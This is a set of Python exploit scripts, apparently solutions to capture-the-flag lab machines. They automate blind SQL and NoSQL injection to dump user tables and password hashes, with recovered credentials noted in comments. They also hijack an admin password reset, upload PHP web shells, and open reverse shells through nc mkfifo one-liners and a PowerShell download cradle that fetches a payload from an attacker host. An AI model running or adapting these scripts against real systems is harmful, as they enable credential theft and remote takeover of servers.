def pwn(): # curl 'http://10.10.10.121:3000/GRAPHQL?query=query%7buser%7b%20username%20password%7d%7d' # [email protected]:godhelpmeplz # sqli in view_tickets_controller.php t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-view.txt') # qry = 'select @@version' # 5.7.24-0ubuntu0.16.04.1 # r = ya.boolExfiltrate(t, qry, 'mysql') # users, settings # qry = ya.templates['mysql']['select']['tables'] # ['USER', 'CURRENT_CONNECTIONS', 'TOTAL_CONNECTIONS', 'id', 'salutation', 'fullname', 'email', 'password', 'timezone', 'status'] # qry = ya.templates['mysql']['select']['columns'].format(table='users') # qry = 'select email from users' # qry = 'select password from users' # [email protected]:c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca # [email protected]:ec09fa0d0ba74336ea7fe392869adb198242f15a # qry = ya.templates['mysql']['select']['columns'].format(table='staff') # ['id', 'username', 'password', 'fullname', 'email', 'login', 'last_login', 'department', 'timezone', 'signature', 'newticket_notification', 'avatar', 'admin', 'status'] # qry = 'select username from staff' qry = 'select password from staff' # admin:d318f44739dced66793b1a603028133a76ae680e:Welcome1 r = ya.boolExfiltrateList(t, qry, 'mysql')
def pwn(): # t = ya.Transport(payloadProcessor=pPayload, responseProcessor=pResponse, requestPath='request.txt') # res = t.send(ya.templates['mssql']['select']['version']) # Microsoft SQL Server 2014 - 12.0.2269.0 (X64) # res = t.send(ya.templates['mssql']['select']['isShellEnabled']) # 1 # res = t.send(ya.templates['mssql']['select']['user']) # web # res = t.send(ya.templates['mssql']['select']['database']) # web # print(res) # idx = 0 # while True: # # qry = ya.templates['mssql']['select']['tables'] # _logins, TEST1, TMPYU # # qry = ya.templates['mssql']['select']['columns'].format(table='_logins') # _e, _l, _n, _p, _u, id # # qry = ya.templates['mssql']['select']['columns'].format(table='TEST1') # ID, OUT # # qry = ya.templates['mssql']['select']['columns'].format(table='TMPYU') # ID, OUT # qry = 'SELECT _e FROM _logins' # [email protected] # limit = ya.templates['mssql']['util']['limit'].format(count=1, offset=idx) # res = t.send(f'{qry} {limit}') # if res is None: break # print(res) # idx += 1 # interactiveCli(rce) # REMEMBER: python -m http.server 80 # p = subprocess.Popen('nc -lvp 443'.split(' ')) # revshell = R"""c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.16/Invoke-PowerShellTcp.ps1'');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 443" """ # rce(revshell) # p.communicate() # bool t = ya.Transport(payloadProcessor=pBoolPayload, predicate=boolPredicate, requestPath='req-verify.txt') ya.boolExfiltrate(t, 'SELECT @@version', 'mssql')
def rce(cmd): t = ya.Transport(payloadProcessor=pPayload, responseProcessor=boolPredicate, requestPath='req-view.txt') t.payloadProcessor = pPayloadStacked ya.mssqlShell(t, cmd) t.payloadProcessor = pPayload ya.mssqlExfilShell(t)
def pwn(): t = ya.Transport(payloadProcessor=pPayload, predicate=timePredicate, requestPath='req-view.txt', debug=True) s = t.client.session res = s.post('http://192.168.0.150/login/resetPassword.php', data={'username': '******'}) # qry = 'select @@version' # 5.7.33-0ubuntu0.18.04.1 qry = 'select token from user where id_level = 1' # unaccessable_until_you_change_me, mJAL3qtMatNCDJ0 newPwd = 'mypassword' token = ya.boolExfiltrate(t, qry, 'mysql', timeBasedDelay=1) data = {'token': token, 'password': newPwd} res = s.post('http://192.168.0.150/login/doChangePassword.php', data=data) if 'Oops!' in res.text: print('[-] error reseting password') exit(-1) print(f'[+] login = admin:{newPwd}') data = {'username': '******', 'password': newPwd} res = s.post('http://192.168.0.150/login/checkLogin.php', data=data) if 'Oops!' in res.text: print('[-] error login') exit(-1) print('[+] logged in') file = { 'id': '2', 'id_user': '******', 'name': 'foo', 'description': 'bar', 'price': '1', 'image': ('x.phar', "<?php system($_GET['cmd']); ?>", 'application/x-php') } res = s.post('http://192.168.0.150/item/updateItem.php', files=file) if 'Oops!' in res.text: print('[-] error uploading webshell') exit(-1) print('[+] webshell uploaded') ip = '192.168.0.102' port = 5555 revshell = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {port} >/tmp/f' p = subprocess.Popen(f'nc -lvp {port}'.split(' ')) res = s.get('http://192.168.0.150/item/image/x.phar', params={'cmd': revshell}) p.communicate()
def pwn(): # t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login') t = ya.Transport(payloadProcessor=pPayload, predicate=timePredicate, requestPath='req.login') # qry = ya.templates['sqlite']['select']['version'] # res = ya.boolExfiltrate(t, qry, 'sqlite') # qry = ya.templates['sqlite']['select']['tables'] # ['users', 'notes', 'bookings', 'sessions'] # qry = ya.templates['sqlite']['select']['columns'].replace('{table}', 'users') # ['CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,active TINYINT(1))'] # qry = "SELECT username FROM users" qry = "SELECT password FROM users" # RickA:fdc8cd4cff2c19e0d1022e78481ddf36 (nevergonnagiveyouup) # res = ya.boolExfiltrateList(t, qry, 'sqlite') res = ya.boolExfiltrateList(t, qry, 'sqlite', timeBasedDelay=2) print(res)
def pwn(): t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login') dbms = 'mysql' # qry = ya.templates[dbms]['select']['version'] # 10.0.23-MariaDB # qry = ya.templates[dbms]['select']['user'] # root@localhost # qry = ya.templates[dbms]['select']['database'] # seattle # ya.boolExfiltrate(t, qry, dbms) # qry = ya.templates[dbms]['select']['tables'] # ['tblBlogs', 'tblMembers', 'tblProducts'] # qry = ya.templates[dbms]['select']['columns'].replace('{table}', 'tblMembers') # ['id', 'username', 'password', 'session', 'name', 'blog', 'admin'] qry = 'SELECT password from tblMembers' # [email protected]:Assasin1 res = ya.boolExfiltrateList(t, qry, dbms) print(res)
def pwn(): t = ya.Transport( payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-login.txt' ) # qry = 'select @@version' # ya.boolExfiltrate(t, qry,'mysql') # q = ya.templates['mysql']['select']['tables'] # users # q = ya.templates['mysql']['select']['columns'].format(table='users') # ID, username, password, role # q = 'SELECT password FROM users' # admin, chris # 0e462096931906507119562988736854, d4ee02a22fc872e36d9e3751ba72ddc8:juggling # ya.boolExfiltrateList(t, q, 'mysql') # admin:240610708 # RUN FTP SERVER WITH shell.php # python3 -m pyftpdlib -p21 -w ftp = threading.Thread(target=ftpd) ftp.daemon = True ftp.start() s = t.client.session s.post('http://10.10.10.73/login.php', {'username':'******','password':'******'}) res = s.post('http://10.10.10.73/upload.php', {'url':'http://10.10.14.9/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.gif'}) hit = re.findall('/var/www/html/(.*?);', res.text)[0] l = subprocess.Popen('nc -lvp 5555', shell=True) params = {'cmd':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 5555 >/tmp/f'} try: s.get(f'http://10.10.10.73/{hit}/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php', params=params, timeout=0.0001) except requests.exceptions.ReadTimeout: pass l.communicate()
def pwn(): t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-user.txt') pTmp = partial('{guess}'.format) users = ya.boolExfiltrateList(t, pTmp, 'nosql', searchChars=string.ascii_lowercase, exfilType=ya.BoolExfiltrateType.NOSQL) # users = ['admin', 'mango'] for user in users: with open('req-pass.txt', 'r') as f: userFilled = f.read().replace('{user}', user) t.client = ya.HttpClient.parse(userFilled, debug=True) searchChars = ''.join( list(set(string.printable) - set(string.whitespace))) # pTmp = partial('PREFIX{guess}'.format) passwords = ya.boolExfiltrateList( t, pTmp, 'nosql', searchChars=searchChars, exfilType=ya.BoolExfiltrateType.NOSQL)
def boolPredicate(res): if 'very sorry' in res.text: return True else: return False def pPayload(p): p = p.replace('SELECT ', '', 1) sqli = f'465\' union select case when ({p})=1 then "main" else "contact" end-- -' return sqli t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-index.txt', useSsl=True) def rce(cmd): t.client.session.cookies['webshell'] = '<?php system($_GET["cmd"]) ?>' res = t.client.session.get( 'https://www.nestedflanders.htb/index.php?id=25') wsPath = f'/var/lib/php/sessions/sess_{res.cookies["PHPSESSID"]}' params = { 'id': f'465\' union select "1\' union select \'{wsPath}\'-- -"-- -', 'cmd': cmd } res = t.client.session.get('https://www.nestedflanders.htb/index.php', params=params) print(res.text)